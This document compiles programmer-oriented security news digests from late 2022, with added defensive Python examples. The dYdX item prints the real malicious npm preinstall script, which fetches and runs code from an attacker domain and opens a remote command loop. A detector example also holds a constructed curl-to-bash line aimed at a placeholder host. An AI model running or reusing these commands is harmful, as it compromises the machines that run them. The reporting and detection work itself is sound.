
Programmers’ Digest 10/12/2022-10/19/2022: New Timing Attack Against NPM Registry API, PoC Exploit Released for Critical Fortinet, Critical New Vulnerability in Apache Commons Text And More

1. New Timing Attack Against NPM Registry API Could Expose Private Packages

A novel timing attack discovered against the npm registry API can be exploited to potentially disclose private packages used by organizations, putting developers at risk of supply chain threats. By creating a list of possible package names, threat actors can detect organizations’ scoped private packages and then publish public packages that masquerade as them, tricking employees and users into downloading them. The Scoped Confusion attack banks on analyzing the time it takes for the npm API (registry.npmjs[.]org) to return an HTTP 404 error message when querying for a private package, and measuring it against the response time for a non-existing module.

It takes on average less time to get a reply for a private package that does not exist compared to a private package that does. The idea, ultimately, is to identify packages internally used by companies, which could then be used by threat actors to create public versions of the same packages in an attempt to poison the software supply chain.

Recommendation 

As preventive measures, it’s recommended that organizations routinely scan npm and other package management platforms for lookalike or spoofed packages that masquerade as the internal counterparts.
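One way to act on that recommendation is to derive, from the organization’s own list of scoped packages, the names an attacker would plausibly register and compare them against what is visible publicly. The Python below is an added example, not code from the research or from npm; it leaves out the registry query and uses a constructed PUBLIC_PACKAGES list in its place so that the matching logic runs offline.

```python
"""Added example (not from the digest): flag public package names that look
like an organization's internal scoped npm packages.

The registry query itself is left out; PUBLIC_PACKAGES stands in for the list
of names a real scan would fetch, so the logic runs offline."""
import re
from difflib import SequenceMatcher

# Constructed sample: scoped packages an organization uses internally.
INTERNAL_PACKAGES = ["@acme/auth-client", "@acme/billing-core", "@acme/ui-kit"]

# Constructed sample of names observed on a public registry.
PUBLIC_PACKAGES = [
    "auth-client",        # bare copy of an internal name
    "auth-cilent",        # transposed letters
    "acme-billing-core",  # scope folded into the name
    "@acme-org/ui-kit",   # near-miss scope
    "ui-kit-acme",        # scope appended
    "@acrne/ui-kit",      # "rn" for "m" in the scope
    "lodash", "react",    # unrelated, must not be flagged
]

SCOPED = re.compile(r"@([^/]+)/(.+)")


def split_scope(pkg):
    """Return (scope, unscoped_name); scope is None for unscoped packages."""
    m = SCOPED.fullmatch(pkg)
    return (m.group(1), m.group(2)) if m else (None, pkg)


def lookalike_candidates(scoped_pkg):
    """Names an attacker could register to shadow a private scoped package."""
    scope, name = split_scope(scoped_pkg)
    if scope is None:
        raise ValueError(f"expected a scoped package, got {scoped_pkg!r}")
    return {
        name,                    # the bare name
        f"{scope}-{name}",       # scope folded in as a prefix
        f"{name}-{scope}",       # scope folded in as a suffix
        f"@{scope}-org/{name}",  # common near-miss scope spellings
        f"@{scope}js/{name}",
    }


def find_lookalikes(internal, public, similarity=0.85):
    """Return (internal, public, reason) for every suspicious public name.

    Rules, in order: exact lookalike variant, same unscoped name under a
    different scope, then a fuzzy match on the unscoped name (typosquats).
    """
    hits = []
    for pkg in internal:
        _, name = split_scope(pkg)
        candidates = lookalike_candidates(pkg)
        for pub in public:
            _, pub_name = split_scope(pub)
            if pub in candidates:
                hits.append((pkg, pub, "variant"))
            elif pub_name == name:
                hits.append((pkg, pub, "same-name-other-scope"))
            elif SequenceMatcher(None, name, pub_name).ratio() >= similarity:
                hits.append((pkg, pub, "similar"))
    return hits


if __name__ == "__main__":
    for internal, public, reason in find_lookalikes(INTERNAL_PACKAGES, PUBLIC_PACKAGES):
        print(f"{internal:22} <- {public:20} ({reason})")
```

The candidate set is deliberately small and explicit; in practice it would be extended with the organization’s real scope misspellings, and the public list would come from periodic registry queries rather than a constant.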

2. PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks

A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access “to do just about anything” on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic.
That said, the researchers who released the PoC noted that there are two essential prerequisites when making such a request:

  • Using the Forwarded header, an attacker is able to set the client_ip to “127.0.0.1”
  • The “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and the User-Agent is “Report Runner” both of which are under attacker control.
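The two prerequisites above are also the two properties a defender can look for in web-server access records. The Python below is an added example, not part of the original report or of any Fortinet tooling; it triages constructed JSON-lines records (the field names src_ip, path and headers are assumptions, not a Fortinet log format). A request whose Forwarded header claims a loopback client while arriving from a non-loopback address is flagged, and flagged as high when it also carries the “Report Runner” User-Agent.

```python
"""Added example (not from the digest): triage HTTP access records for the two
request properties the Fortinet write-up lists as prerequisites: a Forwarded
header claiming a loopback client and a "Report Runner" User-Agent."""
import json
import re

# Constructed sample records in a generic JSON-lines shape. The field names
# are assumptions for this example, not a real Fortinet log format.
RECORDS = [
    {"src_ip": "203.0.113.7", "method": "GET", "path": "/api/v2/example",
     "headers": {"User-Agent": "Report Runner", "Forwarded": "for=127.0.0.1"}},
    {"src_ip": "203.0.113.9", "method": "PUT", "path": "/api/v2/example",
     "headers": {"User-Agent": "curl/7.85.0", "Forwarded": 'for="[::1]"'}},
    {"src_ip": "127.0.0.1", "method": "GET", "path": "/api/v2/example",
     "headers": {"User-Agent": "Report Runner", "Forwarded": "for=127.0.0.1"}},
    {"src_ip": "198.51.100.4", "method": "GET", "path": "/login",
     "headers": {"User-Agent": "Mozilla/5.0"}},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in RECORDS)

# RFC 7239 "for=" element naming a loopback address, quoted or bracketed,
# with an optional port, terminated by end of value or a separator.
LOOPBACK_FOR = re.compile(
    r'for="?\[?(?:127\.0\.0\.1|::1)\]?(?::\d+)?"?(?:$|[;,\s])', re.IGNORECASE)
LOOPBACK_SRC = {"127.0.0.1", "::1"}
REPORT_RUNNER = "Report Runner"


def forwarded_claims_loopback(forwarded):
    """True when a Forwarded header asserts the client is the local host."""
    return bool(LOOPBACK_FOR.search(forwarded or ""))


def classify(record):
    """Severity for one record: high, medium, review or none."""
    headers = record.get("headers", {})
    claims_loopback = forwarded_claims_loopback(headers.get("Forwarded"))
    ua_match = headers.get("User-Agent") == REPORT_RUNNER
    from_loopback = record.get("src_ip") in LOOPBACK_SRC
    if claims_loopback and not from_loopback:
        # An external client asserting it is 127.0.0.1 is the core indicator;
        # the specific User-Agent completes the described pattern.
        return "high" if ua_match else "medium"
    if claims_loopback and ua_match:
        # Genuinely local traffic matching both properties: worth auditing,
        # but not evidence of spoofing on its own.
        return "review"
    return "none"


def triage(log_text):
    """Classify every non-empty JSON line in order."""
    return [classify(json.loads(line)) for line in log_text.splitlines() if line.strip()]


if __name__ == "__main__":
    for record, severity in zip(RECORDS, triage(SAMPLE_LOG)):
        print(f"{severity:7} {record['src_ip']:14} {record['method']} {record['path']}")
```

Whether the header is visible at all depends on where the log is produced: a reverse proxy in front of the appliance sees the raw request, while the appliance’s own log may already have rewritten the client address, which is exactly why the claimed and observed addresses are compared here.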

3. Zimbra Releases Patch for Actively Exploited Vulnerability in its Collaboration Suite

Zimbra has released patches to contain an actively exploited security flaw in its enterprise collaboration suite that could be leveraged to upload arbitrary files to vulnerable instances.
Tracked as CVE-2022-41352 (CVSS score: 9.8), the issue affects a component of the Zimbra suite called Amavis, an open source content filter, and more specifically, the cpio utility it uses to scan and extract archives. The flaw, in turn, is said to be rooted in another underlying vulnerability (CVE-2015-1197) that was first disclosed in early 2015, which according to Flashpoint was rectified, only to be subsequently reverted in later Linux distributions.
An attacker can use the cpio package to gain unauthorized access to any other user account.
Fixes are available in the following versions: 

  • Zimbra 9.0.0 Patch 27
  • Zimbra 8.8.15 Patch 34

All an adversary needs to do to weaponize the shortcoming is send an email with a specially crafted TAR archive attachment that, upon being received, gets submitted to Amavis, which uses the cpio module and thereby triggers the exploit.

4. Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text

Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component. The flaw (CVE-2022-42889) has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and exists in versions 1.5 through 1.9 of Apache Commons Text. Proof-of-concept code for the vulnerability is already available, though so far there has been no sign of exploit activity. The Apache Software Foundation (ASF) released an updated version of the software (Apache Commons Text 1.10.0) on September 24 but issued an advisory on the flaw only last Thursday. In it, the Foundation described the flaw as stemming from insecure defaults when Apache Commons Text performs variable interpolation, the process of looking up and evaluating string values in code that contain placeholders. NIST, meanwhile, urged users to upgrade to Apache Commons Text 1.10.0, which it said “disables the problematic interpolators by default.”

5. Feature-Rich ‘Alchimist’ Cyberattack Framework Targets Windows, Mac, Linux Environments

Researchers have uncovered a potentially dangerous cyberattack framework targeting Windows, Linux, and Mac systems that they assess is likely already being used in the wild. The framework consists of a new, stand-alone, command-and-control (C2) tool dubbed “Alchimist,” a previously unseen remote access Trojan (RAT) called “Insekt,” and several bespoke tools like a custom backdoor and malware for exploiting vulnerabilities in macOS. It also includes reverse proxies and several dual-use tools such as netcat, psexec, and an intranet-scanning tool called fscan. Alchimist is a new C2 framework that can be rapidly deployed and operated with relatively low technical expertise by a threat actor. It can generate a configured payload, establish remote sessions, deploy payloads to the remote machines, capture screenshots, perform remote shellcode execution and run arbitrary commands. Giving it those capabilities are a variety of malware tools, including a Mach-O backdoor for macOS and a separate macOS malware dropper that exploits a known vulnerability in a root program associated with major Linux distributions (CVE-2021-4034).

6. Critical RCE Vulnerability Discovered in Popular Cobalt Strike Hacking Software

HelpSystems, the company behind the Cobalt Strike software platform, has released an out-of-band security update to address a remote code execution vulnerability that could allow an attacker to take control of targeted systems. 
The post-exploitation tool consists of a team server, which functions as a command-and-control (C2) component, and a beacon, the default malware used to create a connection to the team server and drop next-stage payloads. The issue, tracked as CVE-2022-42948, affects Cobalt Strike version 4.7.1, and stems from an incomplete patch released on September 20, 2022, to rectify a cross-site scripting (XSS) vulnerability (CVE-2022-39197) that could lead to remote code execution. The XSS vulnerability could be triggered by manipulating some client-side UI input fields, by simulating a Cobalt Strike implant check-in or by hooking a Cobalt Strike implant running on a host. This means that a malicious actor could exploit this behavior by means of an HTML <object> tag, utilizing it to load a custom payload hosted on a remote server and inject it within the note field as well as the graphical file explorer menu in the Cobalt Strike UI. However, it was found that remote code execution could be triggered in specific cases using the Java Swing framework, the graphical user interface toolkit that’s used to design Cobalt Strike.

7. Researchers Detail Windows Zero-Day Vulnerability Patched Last Month

Details have emerged about a now-patched security flaw in the Windows Common Log File System (CLFS) that could be exploited by an attacker to gain elevated permissions on compromised machines. Tracked as CVE-2022-37969 (CVSS score: 7.8), the issue was addressed by Microsoft as part of its Patch Tuesday updates for September 2022, with Microsoft also noting that it was being actively exploited in the wild. Now, the Zscaler ThreatLabz research team has disclosed that it captured an in-the-wild exploit for the then zero-day on September 2, 2022. The vulnerability is caused by the lack of a strict bounds check on the cbSymbolZone field in the Base Record Header of the base log file (BLF) in CLFS.sys. If cbSymbolZone is set to an invalid offset, an out-of-bounds write occurs at that offset. According to Zscaler, the vulnerability is rooted in a metadata block called the base record that is present in a base log file, which is generated when a log file is created using the CreateLogFile() function.


Programmers’ Digest 09/29/22-10/05/22: Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub, Vulnerability in Packagist PHP Repository, New Unpatched Zero-Day Microsoft Exchange Vulnerability And More

1. dYdX Crypto Exchange NPM User Account Hijacked, Credential Stealing Malware Spread on Their Behalf

Researchers reported suspicious versions of NPM packages that belong to the dYdX Crypto Exchange. The poisoned packages were stealing credentials from victims’ machines and establishing a foothold for future arbitrary code execution. The packages were swiftly removed from the NPM registry. It seems this attack is the result of an account takeover of the NPM account of a dYdX employee, through which the attacker was able to upload new versions of existing credible packages.

Incident details

On September 23rd, the new 1.2.2 version of the NPM package “@dydxprotocol/perpetual” was uploaded from the known NPM account of a dYdX employee; this version included a new preinstall script:

This command downloads and runs the following Bash script:

curl http://api.circle-cdn.com/setup.py --output setuppm.py >> /dev/null 2>&1 && python3 setuppm.py 
&&
rm setuppm.py
&&
if pgrep -f 'api.circle-cdn.com' > /dev/null;
    then pkill -f 'api.circle-cdn.com';
fi
&&
(set +m; bash -c 'while sleep 10;
do outtime=$(curl -s http://api.circle-cdn.com/time.js);
sleep $outtime; curl -s http://api.circle-cdn.com/install.js | bash;
done' &) >> /dev/null 2>&1

Let’s quickly walk through these commands.

  • First, download a python script from a different URL under the same domain, save it to disk and run it.
  • Then, cleanup — remove the python script from the disk and kill the download process if it is still alive
  • The last four lines establish a channel for the attacker to run arbitrary commands on the infected machine. 

This channel is controlled by the files:

  • Time.js — determines the time the victim’s system will sleep before checking with the C2 server for a new command
  • Install.js — determines the actions that will be run on the victim’s machine

Since the attacker can change the content of these two files hosted on their C2 server, they can run any code they’d like.
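The walkthrough above describes the shape of a malicious lifecycle script: fetch something remote, execute it, hide the output, keep a background loop alive. The Python below is an added example, not part of the original report, that scans the scripts section of a package.json for that shape before the package is installed. The package.json and the c2.example.invalid URL are constructed for the example.

```python
"""Added example (not from the dYdX report): flag npm lifecycle scripts that
fetch remote content and execute it. The package.json is constructed and the
c2.example.invalid URL is a placeholder."""
import json
import re

SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "@example/internal-lib",
    "version": "1.2.2",
    "scripts": {
        # Constructed: mirrors the fetch / run / clean up / background-loop shape.
        "preinstall": (
            "curl http://c2.example.invalid/setup.py --output s.py >> /dev/null 2>&1 "
            "&& python3 s.py && rm s.py && (bash -c 'while sleep 10; "
            "do curl -s http://c2.example.invalid/install.js | bash; done' &) "
            ">> /dev/null 2>&1"
        ),
        "postinstall": "node scripts/build.js",
        "test": "jest",
    },
})

# Hooks npm runs automatically during install, i.e. without the user asking.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# A script is flagged only if it reaches out to the network; the remaining
# checks add context about what it does with what it fetched.
FETCH = re.compile(r"\b(curl|wget)\b|https?://")
CONTEXT = [
    ("piped into a shell or interpreter", re.compile(r"\|\s*(?:ba|z|da)?sh\b|\|\s*(?:python3?|node)\b")),
    ("output discarded", re.compile(r">>?\s*/dev/null")),
    ("backgrounded", re.compile(r"&\s*\)|&\s*$")),
    ("cleans up after itself", re.compile(r"\brm\s+(?:-\w+\s+)?\S+")),
]


def suspicious_scripts(package_json_text):
    """Map each suspicious lifecycle hook to the reasons it was flagged."""
    pkg = json.loads(package_json_text)
    findings = {}
    for hook, command in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS or not FETCH.search(command):
            continue
        reasons = ["fetches remote content"]
        reasons += [label for label, rx in CONTEXT if rx.search(command)]
        findings[hook] = reasons
    return findings


if __name__ == "__main__":
    for hook, reasons in suspicious_scripts(SAMPLE_PACKAGE_JSON).items():
        print(f"{hook}: {', '.join(reasons)}")
```

Because this inspects the manifest of the package version actually being installed, it catches the case described here, where a trusted name suddenly gains a network-reaching preinstall hook, without needing the payload itself.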

2. Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks. This vulnerability allows gaining control of Packagist. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects. Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472). An attacker controlling a Git or Mercurial repository explicitly listed by URL in a project’s composer.json can use specially crafted branch names to execute commands on the machine running composer update. A successful exploitation of the flaw meant that requests to update a package could have been hijacked to distribute malicious dependencies by executing arbitrary commands on the backend server running the official instance of Packagist.
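The Packagist bug is an instance of a general pattern: untrusted repository metadata (here a branch name) reaching a shell. The Python below is an added example, not Composer’s or Packagist’s code. It shows the anti-pattern beside a hardened version that validates the name (rules adapted from git-check-ref-format and tightened to a character allow-list) and invokes git with an argument list rather than a shell string.

```python
"""Added example (not Composer's or Packagist's code): validate a Git branch
name before it reaches a subprocess, and build the command as an argument
list instead of a shell string."""
import re
import subprocess

# Stricter than git itself: git allows characters such as backticks and
# semicolons in ref names, which is exactly what makes shell interpolation
# dangerous, so only a conservative allow-list is accepted here.
ALLOWED = re.compile(r"[A-Za-z0-9._/-]+")


def is_valid_branch_name(name):
    """True only for names git accepts that also carry no shell metacharacters."""
    if not name or not ALLOWED.fullmatch(name):
        return False                      # space, $, `, ;, |, quotes, ...
    if name.startswith("-"):
        return False                      # would be parsed as an option by git
    if name.startswith("/") or name.endswith("/") or "//" in name:
        return False                      # malformed ref path
    if ".." in name or name.endswith("."):
        return False                      # git-check-ref-format rules
    for component in name.split("/"):
        if not component or component.startswith(".") or component.endswith(".lock"):
            return False
    return True


def checkout_command_unsafe(branch):
    """The anti-pattern: an untrusted ref interpolated into a shell string.
    With shell=True, a name like "x; id" runs a second command."""
    return f"git checkout {branch}"


def checkout_command(branch):
    """Hardened: validate first, then return argv for subprocess (no shell)."""
    if not is_valid_branch_name(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "checkout", branch]


def checkout(branch, repo_dir):
    """Run the validated checkout in repo_dir without involving a shell."""
    return subprocess.run(checkout_command(branch), cwd=repo_dir, check=True, shell=False)


if __name__ == "__main__":
    for candidate in ["feature/login-fix", "main; id", "$(id)", "--help", "a..b"]:
        print(f"{candidate!r:22} valid={is_valid_branch_name(candidate)}")
```

The argument-list form alone already removes the shell from the picture; the validation step is still worth keeping because a name beginning with a dash would otherwise be interpreted by git as an option.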

3. CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability

 
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian’s Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request. Successful exploitation, however, banks on the prerequisite that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository. All versions of Bitbucket Server and Data Center released after 6.10.17, including 7.0.0 and newer, are affected; this means that all instances running any version between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability. CISA did not provide further details about how the flaw is being exploited and how widespread exploitation efforts are.

4. New Unpatched Zero-Day Microsoft Exchange Vulnerability Under ‘Active Exploitation’

New zero-day vulnerabilities in fully patched Microsoft Exchange servers are under active exploitation. They were discovered in August and allow for remote code execution on affected systems. Researchers suspect that Chinese hackers are responsible for the exploit. Known as CVE-2022-41040 and CVE-2022-41082, the pair of vulnerabilities are being actively exploited in real-world attacks that researchers say could give the hacker a foothold in the victim’s system by dropping web shells and using them to move across a compromised network.
In a blog post on the exploits, Microsoft says it is actively investigating and says it is only aware of “limited targeted attacks” using them to get into users’ systems, and that valid user credentials are required by the hacker to use the exploits. The activity was first spotted by a team from GTSC during a routine security monitoring and incident response exercise for a client last month. They noticed a number of obfuscated webshells in Exchange servers that were similar to a ProxyShell exploit that had been patched a year earlier.

5. Matrix: Install Security Update to Fix End-To-End Encryption Flaws

The Matrix decentralized communication platform has published a security warning about two critical-severity vulnerabilities that affect the end-to-end encryption in its software development kits (SDKs).
A threat actor exploiting these flaws could break the confidentiality of Matrix communications and run man-in-the-middle attacks that expose message contents in a readable form.
Clients affected by the bugs are those using the matrix-js-sdk, matrix-ios-sdk, and matrix-android-sdk2, like Element, Beeper, Cinny, SchildiChat, Circuli, and Synod.im.
Matrix underlines that the issues have been fixed and all that users need to do to keep their communications safe is apply the available updates to their IM clients.

The critical-severity flaws discovered by the team are the following:

  • CVE-2022-39250: Key/Device identifier confusion in SAS verification on matrix-js-sdk, enabling a malicious server administrator to break emoji-based verification when cross-signing is used, authenticating themselves instead of the target user;
  • CVE-2022-39251: Protocol-confusion bug in matrix-js-sdk, leading to incorrectly accepting messages from a spoofed sender, opening up the possibility of impersonating a trusted sender. The same flaw makes it possible for malicious homeserver admins to add backup keys to the target’s account;
  • CVE-2022-39255: Same as CVE-2022-39251 but impacting matrix-ios-sdk (iOS clients);
  • CVE-2022-39248: Same as CVE-2022-39251 but impacting matrix-android-sdk2 (Android clients).

6. Bug Exploitation Now Top Ransomware Access Vector

Vulnerability exploitation accounted for 52% of ransomware incidents investigated by Secureworks over the past 12 months, making it the number one initial access vector for threat actors. “Threat actors continue to rapidly weaponize new vulnerabilities, while developers of offensive security tools (OSTs) are also incentivized – by the need to generate profit or keep their tools relevant – to promptly implement new exploit code,” the report argued.

“Debates about responsible disclosure often miss the fact that even where a patch exists, the process of patching a vulnerability in an enterprise environment is far more complex and slower than the process for threat actors or OST developers of weaponizing publicly available exploit code.” However, security teams must also guard against the persistent threat of credential-based attacks. Secureworks noted a 150% year-on-year increase in the use of info-stealers designed to grab credentials and gain a foothold on networks.

7. Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub

Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities. Vietnamese cybersecurity firm GTSC disclosed that some of their customers had been attacked using two new zero-day vulnerabilities in Microsoft Exchange.  Security researchers are keeping the technical details of the vulnerabilities private, and it appears only a small number of threat actors are exploiting them. Due to this, other researchers and threat actors are awaiting the first public disclosure of the vulnerabilities to use in their own activities, whether defending a network or hacking into one.

Scammers selling fake exploits

To take advantage of this lull before the storm, a scammer has begun creating GitHub repositories where they attempt to sell fake proof-of-concept exploits for the Exchange CVE-2022-41040 and CVE-2022-41082 vulnerabilities.
A scam account found by Paulo Pacheco impersonated Kevin Beaumont who has been documenting the new Exchange vulnerabilities and available mitigations.

Fake Kevin Beaumont account on GitHub

The repositories themselves don’t contain anything of importance, but the README.md describes what is currently known about the new vulnerabilities, followed by a pitch on how they are selling one copy of a PoC exploit for the zero days. “This means it can go unnoticed by the user and potentially by the security team as well. Such a powerful tool should not be fully public, there is strictly only 1 copy available so a REAL researcher can use it: https://satoshidisk.com/pay/xxx,” reads the text in the scam repository. The README files contain a link to a SatoshiDisk page where the scammer is attempting to sell the fake exploit for 0.01825265 Bitcoin, worth approximately $420.00. It should go without saying that this is just a scam, and sending any bitcoin will likely not result in you receiving anything.


Programmers’ Digest 21.09.2022-28.09.2022: Critical Vulnerability in Oracle Cloud, GitHub Cybersecurity Breach, Critical Magento Vulnerability And More

1. Researchers Disclose Critical Vulnerability in Oracle Cloud Infrastructure

Researchers have disclosed a new severe Oracle Cloud Infrastructure (OCI) vulnerability that could be exploited by users to access the virtual disks of other Oracle customers. At its core, the vulnerability is rooted in the fact that a disk could be attached to a compute instance in another account via the Oracle Cloud Identifier (OCID) without any explicit authorization. This meant that an attacker in possession of the OCID could have taken advantage of the vulnerability, dubbed AttachMe, to access any storage volume, resulting in data exposure, exfiltration or, worse, alteration of boot volumes to gain code execution. Besides knowing the OCID of the target volume, another prerequisite to pull off the attack is that the adversary’s instance must be in the same Availability Domain (AD) as the target.

Insufficient validation of user permissions is a common bug class among cloud service providers. The best way to identify such issues is by performing rigorous code reviews and comprehensive tests for each sensitive API in the development stage.
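Insufficient permission validation of the kind described above is easiest to see in a reduced model. The Python below is an added example, not Oracle’s code: an in-memory attach-volume service in which the first version authorizes nothing beyond the identifier’s existence, while the second checks that the caller owns the volume and that volume and instance share an availability domain. The OCID-style identifiers and tenancy names are constructed placeholders.

```python
"""Added example (not Oracle's code): the authorization gap described above,
modelled on an in-memory "attach volume" service. Identifiers and tenancy
names are constructed placeholders, not real OCIDs."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    tenancy: str


@dataclass(frozen=True)
class Instance:
    ocid: str
    tenancy: str
    availability_domain: str


@dataclass(frozen=True)
class Volume:
    ocid: str
    tenancy: str
    availability_domain: str


# Constructed inventory: two tenancies sharing the same cloud region.
VOL_OTHER_TENANT = "ocid1.volume.oc1.example.vol-0001"   # belongs to tenancy-b
VOL_OWN_SAME_AD = "ocid1.volume.oc1.example.vol-0002"    # tenancy-a, AD-1
VOL_OWN_OTHER_AD = "ocid1.volume.oc1.example.vol-0003"   # tenancy-a, AD-2
VOLUMES = {
    VOL_OTHER_TENANT: Volume(VOL_OTHER_TENANT, "tenancy-b", "AD-1"),
    VOL_OWN_SAME_AD: Volume(VOL_OWN_SAME_AD, "tenancy-a", "AD-1"),
    VOL_OWN_OTHER_AD: Volume(VOL_OWN_OTHER_AD, "tenancy-a", "AD-2"),
}


def attach_volume_unvalidated(caller, instance, volume_ocid):
    """Before: the only check is that the identifier resolves. The caller is
    never compared with the volume's owner, so any known OCID can be attached."""
    volume = VOLUMES[volume_ocid]
    return f"attached {volume.ocid} to {instance.ocid}"


def attach_volume(caller, instance, volume_ocid):
    """After: authorize the caller on the volume itself, not just on the instance."""
    volume = VOLUMES.get(volume_ocid)
    if volume is None or volume.tenancy != caller.tenancy:
        # One response for "missing" and "not yours", so the identifier space
        # cannot be probed to learn about other tenants' resources.
        raise PermissionError("volume not found or not authorized")
    if instance.tenancy != caller.tenancy:
        raise PermissionError("instance not authorized")
    if volume.availability_domain != instance.availability_domain:
        raise ValueError("volume and instance must share an availability domain")
    return f"attached {volume.ocid} to {instance.ocid}"


if __name__ == "__main__":
    caller = Principal("tenancy-a")
    inst = Instance("ocid1.instance.oc1.example.inst-0001", "tenancy-a", "AD-1")
    print(attach_volume_unvalidated(caller, inst, VOL_OTHER_TENANT))  # succeeds: the gap
    try:
        attach_volume(caller, inst, VOL_OTHER_TENANT)
    except PermissionError as exc:
        print(f"rejected: {exc}")
```

The test to write for every sensitive API is the cross-tenant one shown in the second call: a valid identifier belonging to another account must be indistinguishable from a non-existent one.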

2. Hackers Stealing GitHub Accounts Using Fake CircleCI Notifications

GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform.
The bogus messages inform recipients that the user terms and privacy policy have changed and they need to sign into their GitHub account to accept the modifications and keep using the services.

Phishing message sent to many GitHub users (CircleCI)

The threat actors’ goal is to steal GitHub account credentials and two-factor authentication (2FA) codes by relaying them through reverse proxies. Accounts protected with hardware security keys for multi-factor authentication (MFA) are not vulnerable to this attack. After obtaining valid account credentials, the threat actors create personal access tokens (PATs), authorize OAuth apps, and sometimes add SSH keys to the account to persist even after a password reset. If you haven’t received a notice from GitHub but have valid grounds to believe you may be a victim of the phishing campaign, the recommendation is to reset your account password and 2FA recovery codes, review your PATs, and, if possible, start using a hardware MFA key.

3. Lessons From the GitHub Cybersecurity Breach

When GitHub revealed details about a security breach that allowed an unknown attacker to download data from dozens of private code repositories, it was a nightmare scenario. Attackers were using information collected from GitHub to target two third-party cloud platforms-as-a-service (PaaS): Heroku and Travis CI. Attackers had stolen OAuth tokens issued to Heroku and Travis CI and used them to access and download the contents of private repositories.

These three simple steps can help improve cybersecurity posture on Salesforce. 

  1. Use Salesforce-Native Applications. Applications built on Salesforce ensure that your data remains in one place with the same cybersecurity posture as the Salesforce platform. With apps consolidated on a single platform, the attack surface is greatly reduced.
  2. Establish a Zero-Trust Model. Never trust, always verify. All users should have the minimum level of permissions and access needed to be able to complete their necessary tasks while requiring users to prove their need and identities before access. Audit everything.
  3. Utilize Secrets Management. Never store credentials in clear text, and always assume private repositories are public. Having a secrets management solution ensures that your secrets are rotated along with having an appropriate level of security compliance around your credentials.

With this improved cybersecurity posture, developers, infosec teams, and the CEO will be at ease knowing that the organization’s most sensitive data is secure.

4. Critical Magento Vulnerability Targeted in New Surge of Attacks

Researchers have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites. Magento is an open-source e-commerce platform owned by Adobe, used by approximately 170,000 online shopping websites worldwide. The CVE-2022-24086 vulnerability was discovered and patched in February 2022, when threat actors were already exploiting it in the wild. At the time, CISA published an alert urging site admins to apply the available security update.

A couple of days later, security researchers published a proof-of-concept (PoC) exploit for CVE-2022-24086, opening the road to mass exploitation.

According to a report published by Sansec today, we have reached that stage, with the critical template vulnerability becoming a favorite in the hacker underground. Sansec’s analysts have observed three attack variants exploiting CVE-2022-24086 to inject a remote access trojan (RAT) on vulnerable endpoints.

5. CISA Warns of Critical ManageEngine RCE Bug Used in Attack

The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical severity Java deserialization vulnerability affecting multiple Zoho ManageEngine products to its catalog of bugs exploited in the wild. This security flaw (CVE-2022-35405) can be exploited in low-complexity attacks, without requiring user interaction, to gain remote code execution on servers running unpatched Zoho ManageEngine PAM360 and Password Manager Pro (without authentication) or Access Manager Plus (with authentication) software.

After being added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, all Federal Civilian Executive Branch Agencies (FCEB) agencies now must patch their systems against this bug exploited in the wild according to a binding operational directive (BOD 22-01) issued in November. The federal agencies have three weeks, until October 13th, to ensure that their networks are protected from exploitation attempts.

6. Npm Packages Used by Crypto Exchanges Compromised

Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised. The packages in question, shown below, appear to have been published from the npm account of a dYdX crypto platform employee, BleepingComputer observed, although the exact cause of this compromise is yet to be determined:
1.  @dydxprotocol/solo – versions 0.41.1, 0.41.2
2.  @dydxprotocol/perpetual – versions 1.2.2, 1.2.3
An earlier advisory claimed that the package ‘@dydxprotocol/node-service-base-dev’ was also affected but it has since been withdrawn.
BleepingComputer observed the compromised version 0.41.1 of ‘solo’ package was still live on npm at the time of writing. These packages make up the “Ethereum Smart Contracts and TypeScript library used for the dYdX Solo Trading Protocol.”
The solo package, for example, is used by at least 44 GitHub repositories belonging to multiple crypto platforms. GitHub READMEs for both ‘solo’ and ‘perpetual’ state these are being “currently used by trade.dydx.exchange.”

7. Native Function and Assembly Code Invocation

